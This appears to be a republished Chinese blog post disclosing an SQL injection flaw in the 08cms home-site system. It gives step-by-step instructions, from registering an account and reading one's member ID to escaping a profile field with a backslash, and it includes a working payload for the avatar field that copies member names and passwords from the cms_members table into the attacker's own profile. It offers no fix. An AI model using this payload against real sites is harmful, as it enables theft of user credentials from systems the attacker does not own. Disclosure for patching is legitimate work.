码迷,mamicode.com
首页 > 其他好文 > 详细

08cms家园系统源码注入漏洞 -中国寒龙出品

时间:2014-12-19 01:50:56      阅读:168      评论:0      收藏:0      [点我收藏+]

标签:blog   http   sp   on   div   2014   log   ad   as   

# Title :08cms家园系统注入漏洞
# Team :08 Security Team
# Author :08安全团队
# 首发 : 08安全团队
#######################################
这个漏洞在5月份已经审计出来了,现在将漏洞放出来。
注册一个账号 会员资料->基本资料 查看表单得到自己的 MID
在真实姓名 填写 \
头像填写

1
,company=(SELECT CONCAT(mname,0x7c,PASSWORD) FROM cms_members limit 0,1) WHERE MID=331
bubuko.com,布布扣bubuko.com,布布扣bubuko.com,布布扣

08cms家园系统源码注入漏洞 -中国寒龙出品

标签:blog   http   sp   on   div   2014   log   ad   as   

原文地址:http://www.cnblogs.com/Hkadmin/p/4173004.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!